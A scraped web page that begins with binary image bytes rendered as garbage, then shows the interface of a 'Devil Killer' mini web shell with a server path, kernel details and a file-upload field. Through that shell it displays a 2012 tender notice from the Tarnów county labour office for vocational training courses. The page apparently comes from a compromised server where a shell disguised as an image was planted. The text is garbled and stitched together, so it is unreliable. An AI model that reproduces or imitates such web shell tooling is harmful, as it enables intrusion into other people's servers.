JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120822/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120822/309956-N-2012.html

<p class="kh_header"><b>Tarnów: Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla osób bezrobotnych 
i  poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie:

CZĘŚĆ I zamówienia - /ABC działalności gospodarczej/,
CZĘŚĆ II zamówienia - /Spawanie blach i rur spoinami pachwinowymi metodą TIG (141)/,
CZĘŚĆ III zamówienia - /Opiekun dzienny/,
CZĘŚĆ IV zamówienia - /Pizzer - Kucharz/</b><br>
<b>Numer ogłoszenia: 309956 - 2012; data zamieszczenia: 22.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowie , pl. J. Bema 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882300, faks 014 6882301.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla osób bezrobotnych 
i  poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie:

CZĘŚĆ I zamówienia - /ABC działalności gospodarczej/,
CZĘŚĆ II zamówienia - /Spawanie blach i rur spoinami pachwinowymi metodą TIG (141)/,
CZĘŚĆ III zamówienia - /Opiekun dzienny/,
CZĘŚĆ IV zamówienia - /Pizzer - Kucharz/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I ZAMÓWIENIA: Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. ABC działalności gospodarczej dla 20 osób, w dwóch grupach po 10 osób,
- szkolenie finansowane jest ze środków publicznych,
- szkolenie każdej grupy winno obejmować minimum 60 godzin zegarowych zajęć, 
- program szkolenia winien obejmować w szczególności: ogólne zasady ekonomiczno-prawne   prowadzenia działalności gospodarczej, wybór formy organizacyjno-prawnej działalności   gospodarczej, rozpoznanie rynku, analiza marketingowa, Biznes Plan, rejestracja   przedsiębiorstwa, działalność gospodarcza przedsiębiorstwa,
- Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
- zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 8:00 a 18:00,
- zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
- szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
- absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer 
   z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku    cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej    przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę    wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia 
   i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis  osoby    upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie,
- Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-8,
OPIS - Usługi szkolenia zawodowego. CZĘŚĆ II ZAMÓWIENIA: Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Spawanie blach i rur   spoinami pachwinowymi metodą TIG (141) dla 10 osób, 
- szkolenie finansowane jest ze środków publicznych,
- szkolenie winno obejmować minimum 135 godzin zegarowych zajęć, w tym minimum 113 godzin   zajęć praktycznych,
- szkolenie musi być realizowane zgodnie z aktualnymi wytycznymi Instytutu Spawalnictwa 
  w Gliwicach,
- przy jednym stanowisku praktycznej nauki zawodu może pracować 1 osoba,
- Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
- zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 8:00 a 18:00,
- szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
- absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer 
  z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca   numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej   szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i  datę wydania   zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie   kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby    upoważnionej przez   instytucję szkoleniową przeprowadzającą szkolenie,
- absolwent otrzymuje również książeczkę spawacza oraz świadectwo egzaminu spawacza,
- Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-8, 
OPIS - Usługi szkolenia zawodowego. 
CZĘŚĆ III ZAMÓWIENIA: Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Opiekun dzienny 
  dla 10 osób, 
- szkolenie finansowane jest ze środków publicznych,
- szkolenie winno obejmować minimum 160 godzin zegarowych zajęć, 
- program szkolenia musi być zatwierdzony przez Ministra Pracy i Polityki Społecznej,
- Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
- zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 800 a 1800,
- szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
- absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer 
  z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca   numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej   szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i  datę wydania  zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie  kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby    upoważnionej przez  instytucję szkoleniową przeprowadzającą szkolenie,
- Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-8, 
OPIS - Usługi szkolenia zawodowego. 
CZĘŚĆ IV ZAMÓWIENIA: Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Pizzer - Kucharz 
  dla 5 osób, 
- szkolenie finansowane jest ze środków publicznych,
- szkolenie winno obejmować minimum 60 godzin zegarowych zajęć, w tym minimum 50 godzin   zajęć praktycznych,
- program szkolenia winien obejmować w szczególności: omówienie technologiczne składników,   klasyfikacja mąk, omówienie glutenu i enzymów, podstawowe ciasto włoskie, proces wyrobu   ciasta (wyrabiania i formowanie ciasta), formowanie ciasta ręcznie, wypiek ciasta, przygotowanie   sosu do pizzy, dodatki, rodzaje ciast i rodzaje pizzy,
- Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
- zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 8:00 a 18:00,
- szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
- absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer 
  z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca   numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej   szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i  datę wydania   zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie   kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby    upoważnionej przez   instytucję szkoleniową przeprowadzającą szkolenie,
- Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.



Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-8, 
OPIS - Usługi szkolenia zawodowego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA: W celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych, prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2012 rok. CZĘŚĆ II ZAMÓWIENIA: W celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2012 rok. CZĘŚĆ III ZAMÓWIENIA: W celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2012 rok. CZĘŚĆ IV ZAMÓWIENIA: W celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2012 rok.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA: Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, minimum 10 osób z zakresu prowadzenia działalności gospodarczej. CZĘŚĆ II ZAMÓWIENIA: Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, minimum 10 osób w zakresie spawania blach i rur spoinami pachwinowymi metodą TIG (141). CZĘŚĆ III ZAMÓWIENIA:Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, minimum 5 osób w zakresie opiekuna dziennego. CZĘŚĆ IV ZAMÓWIENIA: Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, minimum 5 osób w zakresie przygotowywania pizzy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA: Wykonawca musi posiadać salę wykładową o powierzchni minimum 20 m2, 
z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia.
CZĘŚĆ II ZAMÓWIENIA: Wykonawca musi posiadać salę wykładową o powierzchni minimum 20 m2, 
     z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia oraz minimum       10 stanowisk spawalniczych z oprzyrządowaniem niezbędnym do przeprowadzenia szkolenia.
CZĘŚĆ III ZAMÓWIENIA: Wykonawca musi posiadać salę wykładową o powierzchni minimum 20 m2, z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia. CZĘŚĆ IV ZAMÓWIENIA: Wykonawca musi posiadać salę wykładową o powierzchni minimum 20 m2, z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia oraz zapleczem gastronomicznym wraz z piecem do wypieku pizzy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA: Zajęcia na szkoleniu muszą być prowadzone przez osoby posiadające:
a) wykształcenie wyższe zgodne z zakresem prowadzonych zajęć,
b) co najmniej 5-letni staż pracy zgodny z kierunkiem kształcenia,
c) przygotowanie pedagogiczne.
Ponadto osoba prowadząca szkolenie musi posiadać doświadczenie w prowadzeniu zajęć grupowych z zakresu rozpoczęcia i prowadzenia działalności gospodarczej w okresie ostatnich 3 lat przed terminem składania ofert, polegające na przeprowadzeniu w tym okresie minimum 5 szkoleń. Wykonawca wymaga, aby zajęcia prowadzone były przez minimum jedną osobę spełniającą powyższe warunki.
CZĘŚĆ II ZAMÓWIENIA: 1) Zajęcia teoretyczne na szkoleniu muszą być prowadzone przez osoby posiadające: 
    -  wykształcenie wyższe zgodne z zakresem prowadzonych zajęć,
    - co najmniej pięcioletni staż pracy zgodny z zakresem prowadzonych zajęć,
    - przygotowanie pedagogiczne.
    Zajęcia prowadzone przez minimum jedną osobę.
2) Zajęcia praktyczne muszą być prowadzone przez osoby posiadające:
    - wykształcenie minimum średnie kierunkowe,
    - co najmniej pięcioletni staż pracy zgodny z zakresem prowadzonych zajęć,
    - przygotowanie pedagogiczne.
    Zajęcia prowadzone przez minimum jedną osobę.
CZĘŚĆ III ZAMÓWIENIA: Zajęcia na szkoleniu muszą być prowadzone przez osoby posiadające: 
    -  wykształcenie wyższe zgodne z zakresem prowadzonych zajęć,
    - co najmniej pięcioletni staż pracy zgodny z zakresem prowadzonych zajęć,
    - przygotowanie pedagogiczne.
    Zajęcia prowadzone przez minimum 2 osoby.
CZĘŚĆ IV ZAMÓWIENIA: Zajęcia na szkoleniu muszą być prowadzone przez osoby posiadające: 
    - wykształcenie wyższe zgodne z zakresem prowadzonych zajęć,
    - co najmniej pięcioletni staż pracy zgodny z zakresem prowadzonych zajęć,
    - przygotowanie pedagogiczne.
    Zajęcia prowadzone przez minimum 1 osobę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I, II, III, IV ZAMÓWIENIA: Oświadczenie Wykonawcy - załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>CZĘŚĆ I ZAMÓWIENIA: 1. Kalkulacja kosztów szkolenia (załącznik nr 4).
2. Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3. Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom (załącznik nr 6).
4. Formularz ofertowy (załącznik nr 1).
5. Program szkolenia pn. ABC działalności gospodarczej zgodny z opisem przedmiotu zamówienia     (załącznik nr 3).
6. Wykaz zasobów niezbędnych do przeprowadzenia szkolenia (załącznik nr 12).
7. Zaakceptowany wzór ankiety anonimowej dla uczestników szkolenia (załącznik nr 13).
8. Dokument, z którego będzie wynikało uprawnienie do podpisania oferty, np. aktualny odpis 
    z właściwego rejestru, zaświadczenia o wpisie do ewidencji działalności gospodarczej, statut,     rejestr handlowy, itp.
Wszystkie dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby upoważnione do składania oświadczeń woli w imieniu wykonawcy. Jeżeli dokumenty są poświadczone za zgodność z oryginałem przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy, należy do oferty  dołączyć stosowne pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez notariusza. 
CZĘŚĆ II ZAMÓWIENIA: 1. Kalkulacja kosztów szkolenia (załącznik nr 4).
2. Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3. Oświadczenie dotyczące powierzenia części zamówienia podwykonawcom (załącznik nr 6).
4. Formularz ofertowy (załącznik nr 1).
5. Aktualny atest Instytutu Spawalnictwa w Gliwicach lub jednorazowa zgoda na przeprowadzenie szkolenia dla spawaczy wydana przez Instytut Spawalnictwa w Gliwicach.
5. Program szkolenia pn. Spawanie blach i rur spoinami pachwinowymi metodą TIG (141) zgodny z aktualnymi wytycznymi Instytutu Spawalnictwa w Gliwicach oraz opisem przedmiotu zamówienia (załącznik nr 3).
6. Wykaz zasobów niezbędnych do przeprowadzenia szkolenia (załącznik nr 12).
7. Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13).
8. Dokument, z którego będzie wynikało uprawnienie do podpisania oferty, np. aktualny odpis 
    z właściwego rejestru, zaświadczenia o wpisie do ewidencji działalności gospodarczej, statut,     rejestr handlowy, itp.
